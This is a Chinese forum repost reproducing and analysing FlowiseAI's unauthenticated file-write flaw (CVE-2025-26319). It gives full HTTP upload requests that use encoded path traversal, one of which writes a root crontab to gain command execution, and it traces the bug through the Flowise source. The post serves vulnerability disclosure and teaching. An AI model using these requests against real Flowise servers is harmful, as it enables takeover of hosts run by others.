IT评测·应用市场-qidao123.com技术社区

标题: FlowiseAI 任意文件写入漏洞（CVE-2025–26319） [打印本页]

作者: 鼠扑 时间: 2025-3-27 23:08
标题: FlowiseAI 任意文件写入漏洞（CVE-2025–26319）
漏洞简介

Flowise是一款与LangChain兼容的开源低代码工具，使普通用户和开发人员都能通过可视化连线方式创建LLM工作流和AI应用。然而该平台存在严峻的文件上传漏洞——尽管Flowise实施了上传校验机制，攻击者仍可通过特殊编码绕过限制，实现任意目录的文件写入。这一安全缺陷使未经授权的攻击者可以或许上传恶意文件、脚本或SSH密钥，从而获取对托管服务器的远程控制权，对使用该平台构建AI代理的组织构成庞大安全威胁。
漏洞复现

[img=720,226.73454545454547]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524044.png[/img]

[img=720,219.81925343811395]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524047.png[/img]

安装环境后构造上传的数据包

POST /api/v1/attachments/test/test HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 215
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="test.txt"
Content-Type: text/plain
This is the content of the file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--

复制代码

[img=720,320.90625]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524048.png[/img]

在服务器上查找上传文件的位置

[img=720,83.62976406533575]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524049.png[/img]

再次构造数据包

POST /api/v1/attachments/..%2ftest/test HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 215
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="test.txt"
Content-Type: text/plain
This is the content of the file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--

复制代码

[img=720,322.37964774951075]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524050.png[/img]

在服务器上再次查找文件位置

[img=720,93.53474320241692]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524051.png[/img]

乐成实现超过目录的上传操作
【----资助网安学习，以下所有学习资料免费领！加vx：yj520400，备注 “博客园” 获取！】
　① 网安学习成长路径思维导图
　② 60+网安经典常用工具包
　③ 100+SRC漏洞分析报告
　④ 150+网安攻防实战技术电子书
　⑤ 最权威CISSP 认证考试指南+题库
　⑥ 超1800页CTF实战技巧手册
　⑦ 最新网安大厂面试题合集（含答案）
　⑧ APP客户端安全检测指南（安卓+IOS）
进一步的举行利用的话可以通过向定时任务中写入文件实现任意命令实行

POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fusr/..%2fvar%2fspool%2fcron%2fcrontabs HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 657
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="root"
Content-Type: text/plain
# do daily/weekly/monthly maintenance
# min hour day month weekday command
*/15 * * * * run-parts /etc/periodic/15min
0 * * * * run-parts /etc/periodic/hourly
0 2 * * * run-parts /etc/periodic/daily
0 3 * * 6 run-parts /etc/periodic/weekly
0 5 1 * * run-parts /etc/periodic/monthly
* * * * * echo "a" >> /tmp/test.txt
------WebKitFormBoundary7MA4YWxkTrZu0gW--

复制代码

[img=720,319.8289867464729]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524052.png[/img]

[img=720,104.97936726272353]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524053.png[/img]

[img=720,204.48979591836735]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524054.png[/img]

漏洞分析

在Flowise平台的焦点架构中，通过constants.ts文件定义了一系列无需认证即可访问的API端点，这些端点被归类为WHITELIST_URLS。该设计允许特定功能（如API密钥验证、公共谈天流和文件操作等）在未经认证的环境下运行，以提高用户体验和系统灵活性。
Flowise-main/packages/server/src/utils/constants.ts

[img=720,346.9126424308193]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524055.png[/img]

当服务器吸收到新的HTTP请求时，其鉴权流程遵照严格的逻辑顺序：起首检查请求路径是否包含"/api/v1"前缀（不区分大小写）；接着举行大小写敏感的路径验证；随后系统会判断该URL是否存在于预定义的白名单中。若请求路径已被列入白名单，则继承处理；否则，系统会进一步检查请求头中是否包含"internal"标记，或尝试验证API密钥。
Flowise-main/packages/server/src/index.ts

[img=720,330.05253940455344]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524056.png[/img]

Flowise-main/packages/server/src/routes/attachments/index.ts

[img=720,128.45953002610966]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524057.png[/img]

Flowise-main/packages/server/src/services/attachments/index.ts#createFileAttachment

[img=720,256.5941101152369]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524058.png[/img]

/api/v1/attachments/ 路由下存在上传创建文件的操作
Flowise-main/packages/server/src/utils/createAttachment.ts#createFileAttachment

[img=720,350.4778156996587]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524059.png[/img]

createFileAttachment 中会调用 addArrayFilesToStorage 来对文件举行处理
此时我们也可以看到对应的所有上传路由 /api/v1/attachments/:chatflowId/:chatId
Flowise-main/packages/components/src/storageUtils.ts#addArrayFilesToStorage

[img=720,203.27586206896552]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524060.png[/img]

在 addArrayFilesToStorage 中对文件地址举行处理时，会将 chatflowId 和 chatId 未经处理也直接拼接到路径中，所以可以通过编码就直接绕过目录限制实现跨目录的上传。
更多网安技能的在线实操练习，请点击这里>>

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/)